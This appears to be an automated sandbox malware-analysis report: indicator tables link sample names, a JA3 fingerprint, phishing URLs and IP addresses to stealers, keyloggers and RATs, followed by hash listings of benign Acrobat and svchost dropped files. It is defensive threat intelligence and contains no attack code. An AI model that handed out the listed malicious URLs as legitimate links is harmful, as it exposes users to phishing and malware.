 | file.exe | malicious | Clipboard Hijacker, Cryptbot | 44.196.3.45
 | jew.mips.elf | malicious | Unknown | 54.42.218.193
 | file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 44.196.3.45
 | https://us-api.mimecast.com.kb4.io/XWko4Q0hGOG85d2pSNGFBUW1UaEJSL09QUThzR2hrYWl3UGh4aEFVNkQ0dW1jU0FrdnhwRFB2clh1VmRINlRhSTJXNkM0N2NiS0J6WWlVRENjUVlPSWZYbk9xUkNaRDNGSjR3OU1Jd2RSdlJKL0k2cjZWV0ozK1BLRWRrZWJucElFUGVXcFpkM2hlOXluYlErY01WYkRnNmtzUldXNlJEcmIvN0Z0WVNMOHNobW5lMjVGcEdENDA0TWZNblZTWFVuRUp3PS0taC91cHJQRm5XdmFVejBTdC0tWVNTU2ZrYnF5clZ0ZndVU0tiNHIzUT09?cid=2313358952 | malicious | KnowBe4 | 54.85.18.81
 | file.exe | malicious | Clipboard Hijacker, Cryptbot | 34.224.200.202
 | https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.png | malicious | HTMLPhisher | 54.224.154.88
 | file.exe | malicious | Clipboard Hijacker, Cryptbot | 44.196.3.45
JA3 Fingerprints
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | IFhqcKaIol.lnk | malicious | Unknown | 101.99.75.174
 | JSWunwO4rS.lnk | malicious | LummaC Stealer | 101.99.75.174
 | 7p5nITtglJ.lnk | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
 | kjshdkfgjsdg.bat | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
 | https://t.ly/alBFX | malicious | Unknown | 101.99.75.174
 | QD40FIJ8QK.lnk | malicious | Unknown | 101.99.75.174
 | TEKL_F _STE_I Unilever San ve Tic Trk A__PDF.exe | malicious | Snake Keylogger, VIP Keylogger | 101.99.75.174
 | AS6xKJzYJT.exe | malicious | Python Stealer, XenoRAT | 101.99.75.174
 | yG53aU3gGm.exe | malicious | Unknown | 101.99.75.174
Dropped Files: No context
Process: C:\Windows\System32\svchost.exe
File Type: data
Category: dropped
Size (bytes): 1310720
Entropy (8bit): 0.4932262607720992
Encrypted: false
SSDEEP: 1536:cJNnm0h6QV70hV40h5RJkS6SNJNJbSMeCXhtvKTeYYJyNtEBRDna33JnbgY1ZtaU:cJhXC9lHmutpJyiRDeJ/aUKrDgnm2
MD5: 670622AFBC7CC899FB77A45254EAD470
SHA1: 6D60CDCE86F969A60AF70FB1E14473FD1124EA63
SHA-256: 01EAB1E0E890784D88F3087B143A26A32062633998C31E23D373344CB4072823
SHA-512: 2640A6B47E6F29F22D62F0B355BAE7B62D183A1F9970096CB5A68BD35CCDC2FDC17531FC8FF271E5350D170E25BEA7FCC416C3C3C65BC240D05C1440EDD56043
Malicious: false
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb1919ad2, page size 16384, DirtyShutdown, Windows version 10.0
                                                              Category:dropped
                                                              Size (bytes):1310720
                                                              Entropy (8bit):0.7217505855288701
                                                              Encrypted:false
                                                              SSDEEP:1536:zSB2ESB2SSjlK/Tv5m0hnRJjAVtu8Ykr3g16tV2UPkLk+kcBLZiAcZwytuknSDVd:zazaNvFv8V2UW/DLzN/w4wZi
                                                              MD5:787CA1F04CC9B5118452429AB6ED1E32
                                                              SHA1:3B698DE7D2B34094D23B18A40B51CB8FB7AEC7B7
                                                              SHA-256:BC93F98D90C4BFB34C4B6055AE67D138CD31A2DEEEB6A7FF646CC037F9EAE926
                                                              SHA-512:BAEF2CC3805873F72B3371E9D5597C68046DC62CF8F6D28DDC959CD82BDD323AFE4A293237B9D0E91367C7AFA8B03DE6D4F457BA3F7B254EF439812AE12FEB87
                                                              Malicious:false
                                                              Process:C:\Windows\System32\svchost.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):16384
                                                              Entropy (8bit):0.08055358206209384
                                                              Encrypted:false
                                                              SSDEEP:3:cP/8Ye2fVG7gr/fgsCrZClW/tOwVG+ll+SHY/Xl+/rQLve:sUzKU7Kfgs3GowVGaAS4M
                                                              MD5:9763D55EB9A4D9353A7A0614020BBB70
                                                              SHA1:B9B14A21B456A6C5D30EBCF7A581BBDA9AF90133
                                                              SHA-256:2E4CD12ACB193EEB3DAF866003C68DD0D963CE2339516460DE200E6EE7FBD20B
                                                              SHA-512:B6F28620A21BC0A55FC66D98D99C953287AB7F447E880DBDE895176002AFC19680EE19A60F9AFA9EABD702859D56E74509400F0EDF9F87B8D2668B93EA3C6738
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):290
                                                              Entropy (8bit):5.250804707081586
                                                              Encrypted:false
                                                              SSDEEP:6:FUCSQL+q2PqLTwi2nKuAl9OmbnIFUt8c4G1Zmw+c4QLVkwOqLTwi2nKuAl9Ombjd:FUCSVv8wZHAahFUt8c4G1/+c4I5TwZHi
                                                              MD5:73A890337944C9A72612F19450D3B9EE
                                                              SHA1:346F5C768350CE601D4D797093B88F0882DFFE27
                                                              SHA-256:02460E0BF1D4CFF58601A943E65A6530EF9BEB139B8850E5F401FE1DC473A986
                                                              SHA-512:2F5C2F431280303C8A2249C794B9DEB42508A18CE52755EDE99D682DBFAF9A63B41016EB9125D7CDE0C31C5C88E97F8B7E723372834E4A1C48C23B0E8CB82783
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.367 1fc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:46:36.370 1fc8 Recovering log #3.2024/12/06-09:46:36.370 1fc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):290
                                                              Entropy (8bit):5.250804707081586
                                                              Encrypted:false
                                                              SSDEEP:6:FUCSQL+q2PqLTwi2nKuAl9OmbnIFUt8c4G1Zmw+c4QLVkwOqLTwi2nKuAl9Ombjd:FUCSVv8wZHAahFUt8c4G1/+c4I5TwZHi
                                                              MD5:73A890337944C9A72612F19450D3B9EE
                                                              SHA1:346F5C768350CE601D4D797093B88F0882DFFE27
                                                              SHA-256:02460E0BF1D4CFF58601A943E65A6530EF9BEB139B8850E5F401FE1DC473A986
                                                              SHA-512:2F5C2F431280303C8A2249C794B9DEB42508A18CE52755EDE99D682DBFAF9A63B41016EB9125D7CDE0C31C5C88E97F8B7E723372834E4A1C48C23B0E8CB82783
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.367 1fc8 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:46:36.370 1fc8 Recovering log #3.2024/12/06-09:46:36.370 1fc8 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):334
                                                              Entropy (8bit):5.182546527478554
                                                              Encrypted:false
                                                              SSDEEP:6:FbU3+q2PqLTwi2nKuAl9Ombzo2jMGIFUt8cVVdXZmw+cVVd3VkwOqLTwi2nKuAlx:Fpv8wZHAa8uFUt8cVX/+cVF5TwZHAa8z
                                                              MD5:DD4DD37DCE2B5AED3AD7092946A884AD
                                                              SHA1:E4B2AD61E62C155CC3111F87A8C76D1A3A0E9875
                                                              SHA-256:2836AD383B5655266A8C53C31A9C146453EE8B141B432B572EE996B660E624D2
                                                              SHA-512:3DD863B0CD2BD04B6D2BF1B9F386F47C65EF6BCFCAACD2A97E05B64DE1A93781652FE87B2D4165D2A803F1F971C0CBDC9DB265F59738F9114248581599BF518F
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.428 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:46:36.430 1608 Recovering log #3.2024/12/06-09:46:36.430 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):334
                                                              Entropy (8bit):5.182546527478554
                                                              Encrypted:false
                                                              SSDEEP:6:FbU3+q2PqLTwi2nKuAl9Ombzo2jMGIFUt8cVVdXZmw+cVVd3VkwOqLTwi2nKuAlx:Fpv8wZHAa8uFUt8cVX/+cVF5TwZHAa8z
                                                              MD5:DD4DD37DCE2B5AED3AD7092946A884AD
                                                              SHA1:E4B2AD61E62C155CC3111F87A8C76D1A3A0E9875
                                                              SHA-256:2836AD383B5655266A8C53C31A9C146453EE8B141B432B572EE996B660E624D2
                                                              SHA-512:3DD863B0CD2BD04B6D2BF1B9F386F47C65EF6BCFCAACD2A97E05B64DE1A93781652FE87B2D4165D2A803F1F971C0CBDC9DB265F59738F9114248581599BF518F
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.428 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:46:36.430 1608 Recovering log #3.2024/12/06-09:46:36.430 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:modified
                                                              Size (bytes):475
                                                              Entropy (8bit):4.975057483198527
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqeLsBdOg2HNAcaq3QYiub5P7E4TX:Y2sRdsfsdMHNr3QYhbt7n7
                                                              MD5:EE1817416A3B4E5E964BAB82FA64273E
                                                              SHA1:D796DBD31BD8A021330DBBA93C2F87E9E79AB947
                                                              SHA-256:F5B07AB55B48A211DB28AE5B65761F396DDF017D16AF0EB023634EB253E11542
                                                              SHA-512:B0756B79D22105E628DFCCDFF87321D53DA58A97DCE992C70AFE616CB25907319E559E7675683560849274BA4397A7423078989CC8089CD27AE829DF9DAADD7B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378056404473799","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":629777},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.96165270016851
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                              MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                              SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                              SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                              SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.96165270016851
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                              MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                              SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                              SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                              SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:JSON data
                                                              Category:dropped
                                                              Size (bytes):475
                                                              Entropy (8bit):4.96165270016851
                                                              Encrypted:false
                                                              SSDEEP:12:YH/um3RA8sqxpsBdOg2Hl/2caq3QYiub5P7E4TX:Y2sRds+6dMHlR3QYhbt7n7
                                                              MD5:ACCB522AE87A739BDC04EB5A34975EEB
                                                              SHA1:A41FED54445E729A85E7017A002D4FF6FCAFEC93
                                                              SHA-256:C7106DE6A60A389FB9B4BBC9971C9922919583A3C382664F3E78DFDC2A95AE96
                                                              SHA-512:5B35F36E3C53CC53F90AEA276934753CAD809640E7447BD9F7AAFF48FD46EFBE5FFDEEBC19770D7D0550E67624AB76571D64525F00B82430534576B3015EFF3B
                                                              Malicious:false
                                                              Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341057329405343","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149545},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.9","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):3878
                                                              Entropy (8bit):5.22378385521005
                                                              Encrypted:false
                                                              SSDEEP:96:GICD8SBCmPAi8j0/8qbGNSwPgGYPx8xRqhm068OzpN+HzwQrs:1CDLCmPj8j0/8qKgwPHYPx8xemT8OzpP
                                                              MD5:ECEFB335E1EF6921BED657B68EB550CE
                                                              SHA1:0E1013E0E44EA85F56998D5E1F621EFACCF01494
                                                              SHA-256:7F5E3D60F833903A4BD8130EE60D156BAF15E32BF2F0649D5AD2B05B8C95E606
                                                              SHA-512:4805573F4B05D7ABD32027C0B55EFA5FDCE78CAA6788A7C8EC5AB5875AF968C8C1F639D726EBB98222427DDBF4A1836C918AE098651B3D5C7352AFED8A7A0086
                                                              Malicious:false
                                                              Preview:*...#................version.1..namespace-W...o................next-map-id.1.Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.0.w..r................next-map-id.2.Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/.1:M4.r................next-map-id.3.Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/.2IE..o................next-map-id.4.Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.3KQ..^...............Pnamespace-ed11ed50_1515_4296_b27c_721e1e1acdec-https://rna-resource.acrobat.com/.xK.^...............Pnamespace-b58dfce7_364b_43da_946b_3d7546a793e5-https://rna-resource.acrobat.com/.i.+a...............Snamespace-f62cae74_b031_4dd2_8c7b_e9ef3858dbf9-https://rna-v2-resource.acrobat.com/Tz.qa...............Snamespace-2a2b5482_c0ce_4c74_9fbc_8a8daf6ed72d-https://rna-v2-resource.acrobat.com/"_.o................next-map-id.5.Pnamespace-7c898a99_566e_4628_b4ec_
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):322
                                                              Entropy (8bit):5.196492275018618
                                                              Encrypted:false
                                                              SSDEEP:6:Fqz+q2PqLTwi2nKuAl9OmbzNMxIFUt8cXk5Zmw+coVkwOqLTwi2nKuAl9OmbzNMT:FqKv8wZHAa8jFUt8cXk5/+cA5TwZHAab
                                                              MD5:B0A59F34F119DF5954D7696B96667A69
                                                              SHA1:D3E29DE9310299BE7B992B7F396EE1C779C4C9AE
                                                              SHA-256:A266D150B9B959E42AB81CF2810492A180AB7C76C6F396333977AA457666AC3D
                                                              SHA-512:09A454A4522197271E4C6FE002B16D6F9549332CB5D46D3E46F6D855CB8EC5CBE14AE8C23AB32362FA6E3E6470B7D1C7EC1DC697CE97BF31580D3880639BB857
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.806 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:46:36.815 1608 Recovering log #3.2024/12/06-09:46:36.820 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:ASCII text
                                                              Category:dropped
                                                              Size (bytes):322
                                                              Entropy (8bit):5.196492275018618
                                                              Encrypted:false
                                                              SSDEEP:6:Fqz+q2PqLTwi2nKuAl9OmbzNMxIFUt8cXk5Zmw+coVkwOqLTwi2nKuAl9OmbzNMT:FqKv8wZHAa8jFUt8cXk5/+cA5TwZHAab
                                                              MD5:B0A59F34F119DF5954D7696B96667A69
                                                              SHA1:D3E29DE9310299BE7B992B7F396EE1C779C4C9AE
                                                              SHA-256:A266D150B9B959E42AB81CF2810492A180AB7C76C6F396333977AA457666AC3D
                                                              SHA-512:09A454A4522197271E4C6FE002B16D6F9549332CB5D46D3E46F6D855CB8EC5CBE14AE8C23AB32362FA6E3E6470B7D1C7EC1DC697CE97BF31580D3880639BB857
                                                              Malicious:false
                                                              Preview:2024/12/06-09:46:36.806 1608 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:46:36.815 1608 Recovering log #3.2024/12/06-09:46:36.820 1608 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 11, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 11
                                                              Category:dropped
                                                              Size (bytes):86016
                                                              Entropy (8bit):4.4388384957695095
                                                              Encrypted:false
                                                              SSDEEP:384:ye+ci5GliBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:ppurVgazUpUTTGt
                                                              MD5:B615281E9A3DD4744EBE361CA962DA0C
                                                              SHA1:2788969B03BE87389993F84D04F1548CCC1B7986
                                                              SHA-256:B43955DB8557870917E32646752CB1E1C283A91DBB18A784C6FDCDB7FE82585E
                                                              SHA-512:39B6BFAF23CB2E1F98A8A154D6BA160425F657D3EA9CED956B46486E1CC346DB7030B6D6E5F3A72798D5C3F75E1CE80FC39A3E2A9679262EBE10588FE6C021AE
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:SQLite Rollback Journal
                                                              Category:dropped
                                                              Size (bytes):8720
                                                              Entropy (8bit):3.7686253958687925
                                                              Encrypted:false
                                                              SSDEEP:48:7MssJioyVPioyHoy1C7oy16oy1FKOioy1noy1AYoy1Wioy1oioykioyBoy1noy1X:7gJuPVcXjBiSb9IVXEBodRBkA
                                                              MD5:B3A2639C45CDC20D24124DC00C726321
                                                              SHA1:11424CC92B697419CDF1821723837026E7157A2D
                                                              SHA-256:E21EF6BF78114497CC7C689CE48D4FDC12D41453D9B9A1D220C10BE1D76E6086
                                                              SHA-512:E9F58DAF8FAD0BDC65785E15E07AC097D26C7BC0E2CF1215D58334D7325A698B67D20C5F4072580A77BDC05F0000449A8B6EF64A77905111E97C32783AAE2C6E
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:Certificate, Version=3
                                                              Category:dropped
                                                              Size (bytes):1391
                                                              Entropy (8bit):7.705940075877404
                                                              Encrypted:false
                                                              SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                              MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                              SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                              SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                              SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                              Malicious:false
                                                              Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                              Category:dropped
                                                              Size (bytes):71954
                                                              Entropy (8bit):7.996617769952133
                                                              Encrypted:true
                                                              SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                              MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                              SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                              SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                              SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                              Malicious:false
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):192
                                                              Entropy (8bit):2.770710652184824
                                                              Encrypted:false
                                                              SSDEEP:3:kkFklPsXPvfllXlE/HT8k+TulXNNX8RolJuRdxLlGB9lQRYwpDdt:kKrXIT8eNMa8RdWBwRd
                                                              MD5:3DEFA99F8209842B0EBAF248F5711842
                                                              SHA1:28F423E8B61CACC7677F5171BF3DE69D6551D6EF
                                                              SHA-256:302526A73CA2A89ED8147DAE43A3D320BE124C3D2F7ABDE4A5E0DB4E2173B914
                                                              SHA-512:263B0B40131B49935B0986F768AD05BADF8C1D35D73231839FE6912BF5556C9E498CA1AD78F9001FB8D4BF915BF1B5D084610D02BC6DFA9CC401B7C174162041
                                                              Malicious:false
                                                              Preview:p...... .........I...G..(....................................................... ..........W....[6..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              File Type:data
                                                              Category:modified
                                                              Size (bytes):328
                                                              Entropy (8bit):3.2394988199912085
                                                              Encrypted:false
                                                              SSDEEP:6:kKFebNF9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:wqDImsLNkPlE99SNxAhUe/3
                                                              MD5:1996DB69E7FF64F4EE96797FDB694EDE
                                                              SHA1:A00CB8A126CD1AA96B0967BDC6EBCFA96705CB6D
                                                              SHA-256:D8C9D04B36A8236D46D7F1A3371A43BC8204F603B2624394ADE4B4CAC2818DBF
                                                              SHA-512:ED58F40B35B5953F5BC369F286950C7AF786A205F764EBB4BBD4E7687E2193E66142F2FC91D2F498AF6ACF2DD240FC745C4C7246F3F98988056A1B4C9F1D70F5
                                                              Malicious:false
                                                              Preview:p...... ........1...G..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):1233
                                                              Entropy (8bit):5.233980037532449
                                                              Encrypted:false
                                                              SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                              MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                              SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                              SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                              SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                              Malicious:false
                                                              Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                              Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                              File Type:PostScript document text
                                                              Category:dropped
                                                              Size (bytes):10880
                                                              Entropy (8bit):5.214360287289079
                                                              Encrypted:false
                                                              SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                              MD5:B60EE534029885BD6DECA42D1263BDC0
                                                              SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                              SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
